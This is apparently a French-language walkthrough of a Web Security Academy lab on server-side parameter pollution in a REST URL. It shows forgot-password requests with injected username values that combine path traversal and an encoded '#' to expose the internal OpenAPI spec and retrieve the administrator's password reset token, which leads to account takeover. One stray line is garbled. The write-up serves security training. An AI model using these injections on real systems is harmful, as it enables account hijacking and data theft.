Pollution de paramètres dans une URL REST côté serveur

Exploiting server-side parameter pollution in a REST URL

Lab: Exploiting server-side parameter pollution in a REST URL | Web Security AcademyWebSecAcademy

Objectif du laboratoire Se connecter en tant qu’administrator et supprimer l’utilisateur carlos.

1. Fonctionnalité « Mot de passe oublié »

On accède à la fonctionnalité Forgot password et on saisit le nom d’utilisateur administrator.

La requête envoyée côté serveur est la suivante :

POST /forgot-password

csrf=CiKtg4vkiqLtNS3lAtIhUaMNSuOfnjh1&username=administrator

Réponse obtenue :

{
    "result":"*****@normal-user.net",
    "type":"email"
}

2. Analyse du code JavaScript côté client

Le code JavaScript montre que la valeur username est envoyée telle quelle dans la requête, sans validation serveur supplémentaire.

let forgotPwdReady = (callback) => {
    if (document.readyState !== "loading") callback();
    else document.addEventListener("DOMContentLoaded", callback);
}

function urlencodeFormData(fd){
    let s = '';
    function encode(s){ return encodeURIComponent(s).replace(/%20/g,'+'); }
    for(let pair of fd.entries()){
        if(typeof pair[1]=='string'){
            s += (s?'&':'') + encode(pair[0])+'='+encode(pair[1]);
        }
    }
    return s;
}

const validateInputsAndCreateMsg = () => {
    try {
        const forgotPasswordError = document.getElementById("forgot-password-error");
        forgotPasswordError.textContent = "";
        const forgotPasswordForm = document.getElementById("forgot-password-form");
        const usernameInput = document.getElementsByName("username").item(0);
        if (usernameInput && !usernameInput.checkValidity()) {
            usernameInput.reportValidity();
            return;
        }
        const formData = new FormData(forgotPasswordForm);
        const config = {
            method: "POST",
            headers: {
                "Content-Type": "x-www-form-urlencoded",
            },
            body: urlencodeFormData(formData)
        };
        fetch(window.location.pathname, config)
            .then(response => response.json())
            .then(jsonResponse => {
                if (!jsonResponse.hasOwnProperty("result"))
                {
                    forgotPasswordError.textContent = "Invalid username";
                }
                else
                {
                    forgotPasswordError.textContent = `Please check your email: "${jsonResponse.result}"`;
                    forgotPasswordForm.className = "";
                    forgotPasswordForm.style.display = "none";
                }
            })
            .catch(err => {
                forgotPasswordError.textContent = "Invalid username";
            });
    } catch (error) {
        console.error("Unexpected Error:", error);
    }
}

const displayMsg = (e) => {
    e.preventDefault();
    validateInputsAndCreateMsg(e);
};

forgotPwdReady(() => {
    const queryString = window.location.search;
    const urlParams = new URLSearchParams(queryString);
    const resetToken = urlParams.get('reset-token');
    if (resetToken)
    {
        window.location.href = `/forgot-password?passwordResetToken=${resetToken}`;
    }
    else
    {
        const forgotPasswordBtn = document.getElementById("forgot-password-btn");
        forgotPasswordBtn.addEventListener("click", displayMsg);
    }
});

Cela suggère que la valeur peut être interprétée comme faisant partie du chemin de l’API backend.

3. Tentatives de pollution du paramètre `username`

Ajout d’un # en fin de paramètre :

&username=administrator#

Réponse :

{
  "type": "error",
  "result": "Invalid route. Please refer to the API definition"
}

Tentative de traversée de chemins :

&username=../../../../administrator

Réponse : erreur Not Found provenant du serveur API.

{
  "error": "Unexpected response from API server:\n<html>\n<head>\n    <meta charset=\"UTF-8\">\n    <title>Not Found<\/title>\n<\/head>\n<body>\n    <h1>Not found<\/h1>\n    <p>The URL that you requested was not found.<\/p>\n<\/body>\n<\/html>\n"
}

4. Découverte de la documentation OpenAPI

https://gist.githubusercontent.com/rodnt/250dd33af97d228cc94cd11504abef06/raw/fff03a47c9315644ee20dcedf34f4a1988fdb529/paths.txtgist.githubusercontent.com

En combinant la traversée de répertoires et le caractère # :

csrf=CiKtg4vkiqLtNS3lAtIhUaMNSuOfnjh1&username=../../../../administrator%23

me deucle openapi.jsojn con mucho length

Message d'erreur:

{
  "error": "Unexpected response from API server:\n{\n  \"openapi\": \"3.0.0\",\n  \"info\": {\n    \"title\": \"User API\",\n    \"version\": \"2.0.0\"\n  },\n  \"paths\": {\n    \"/api/internal/v1/users/{username}/field/{field}\": {\n      \"get\": {\n        \"tags\": [\n          \"users\"\n        ],\n        \"summary\": \"Find user by username\",\n        \"description\": \"API Version 1\",\n        \"parameters\": [\n          {\n            \"name\": \"username\",\n            \"in\": \"path\",\n            \"description\": \"Username\",\n            \"required\": true,\n            \"schema\": {\n        ..."
}

Le serveur renvoie une erreur contenant la documentation OpenAPI, révélant les routes internes disponibles, notamment :

/api/internal/v1/users/administrator/field/{field}

5. Exploitation de l’API interne

On adapte le paramètre username pour cibler directement l’API :

administrator/field/test%23

{
  "type": "error",
  "result": "This version of API only supports the email field for security reasons"
}

Réponse valide avec l’email de l’administrateur.

&username=administrator/field/email%23

6. Récupération du token de réinitialisation

../../v1/users/administrator

En testant d’autres champs exposés par l’API :

&username=../../v1/users/administrator/field/passwordResetToken%23

Réponse :

{
  "type": "passwordResetToken",
  "result": "guw2qorqvfcpqohuv92wb460x4da485o"
}

7. Réinitialisation du mot de passe administrateur

On utilise le token récupéré pour accéder à la page de réinitialisation :

/forgot-password?passwordResetToken=guw2qorqvfcpqohuv92wb460x4da485o

Cela permet de définir un nouveau mot de passe pour administrator, puis de se connecter et supprimer l’utilisateur carlos.

Mis à jour il y a 1 mois

hashtagExploiting server-side parameter pollution in a REST URL

hashtag1. Fonctionnalité « Mot de passe oublié »

hashtag2. Analyse du code JavaScript côté client

hashtag3. Tentatives de pollution du paramètre username

hashtag4. Découverte de la documentation OpenAPI

hashtag5. Exploitation de l’API interne

hashtag6. Récupération du token de réinitialisation

hashtag7. Réinitialisation du mot de passe administrateur